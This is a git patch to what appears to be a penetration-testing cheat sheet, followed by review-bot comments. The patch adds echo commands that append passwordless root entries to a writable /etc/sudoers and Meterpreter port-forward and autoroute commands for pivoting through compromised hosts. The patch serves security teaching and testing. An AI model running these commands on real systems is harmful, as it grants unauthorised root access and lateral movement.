From 94a60b43d683837523024845f19b97b1d984e201 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 11:00:54 +0200 Subject: [PATCH] Writable /etc/sudoers + Meterpreter autoroute --- .../Linux - Privilege Escalation.md | 15 +++++++++-- .../Network Pivoting Techniques.md | 27 ++++++++++++++++--- 2 files changed, 37 insertions(+), 5 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 681ef8a..6afe24e 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -7,7 +7,7 @@ ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) -- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123) +- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) ## Summary @@ -35,7 +35,8 @@ * [sudo_inject](#sudo-inject) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) -* [Writable /etc/passwd](#writable---etc---passwd) +* [Writable /etc/passwd](#writable-etcpasswd) +* [Writable /etc/sudoers](#writable-etcsudoers) * [NFS Root Squashing](#nfs-root-squashing) * [Shared Library](#shared-library) * [ldconfig](#ldconfig) 
@@ -399,6 +400,16 @@ su - dummy NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. +## Writable /etc/sudoers + +```powershell +echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers + +# use SUDO without password +echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +``` + + ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index e35bc19..9ef65ac 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -103,15 +103,36 @@ optional arguments: ## Metasploit -```c -portfwd list +```powershell +# Meterpreter list active port forwards +portfwd list + +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd add –l 3389 –p 3389 –r target-host portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd delete –l 3389 –p 3389 –r target-host +# Meterpreter delete all port forwards +portfwd flush + or -run autoroute -s 192.168.57.0/24 +# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 +run autoroute -s 192.168.15.0/24 use auxiliary/server/socks4a + +# Meterpreter list all active routes +run autoroute -p + +route #Meterpreter view available networks the compromised host can access +# Meterpreter add route for 192.168.14.0/24 via Session number. +route add 192.168.14.0 255.255.255.0 3 +# Meterpreter delete route for 192.168.14.0/24 via Session number. +route delete 192.168.14.0 255.255.255.0 3 +# Meterpreter delete all routes +route flush ``` ## sshuttle
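Review bot: in the new "Writable /etc/sudoers" hunk, the fence is tagged `powershell` but the two `echo ... >> /etc/sudoers` lines are POSIX shell run on the Linux host; tag the block `bash` (or `sh`) so the syntax highlighting and any reader copying it match the environment. The same hunk should also note that appending a malformed line to `/etc/sudoers` breaks `sudo` for every user on the box, so a `visudo -cf /etc/sudoers` check after the edit belongs next to these commands. Minor: the first `echo` line has no space before `>>` (`ALL">>/etc/sudoers`) while the second does, and there are two blank lines before `## NFS Root Squashing` where the rest of the file uses one.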
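Review bot: the `portfwd` lines in the Network Pivoting hunk use Unicode en-dashes instead of ASCII hyphens (`portfwd add –l 3389 –p 3389 –r target-host` and the matching `portfwd delete` line), so Meterpreter will not parse the flags if the commands are pasted as written; replace them with `-l`, `-p`, `-r`. The comment above `portfwd delete` is a copy of the `portfwd add` comment ("Forwards 3389 (RDP) to 3389 ...") and should say that it removes that forward. The bare `or` line sits inside the fence and is neither a command nor a comment; either prefix it with `#` or move it out of the block. The fence is retagged from `c` to `powershell`, but these are Meterpreter/msfconsole commands, so a neutral tag such as `text` (or none) would be more accurate. Small wording fixes: "Meterpreters autoroute script" should be "Meterpreter's autoroute script", and the inline `route #Meterpreter view ...` comment would be clearer on its own line above the command, matching the style of the surrounding comments.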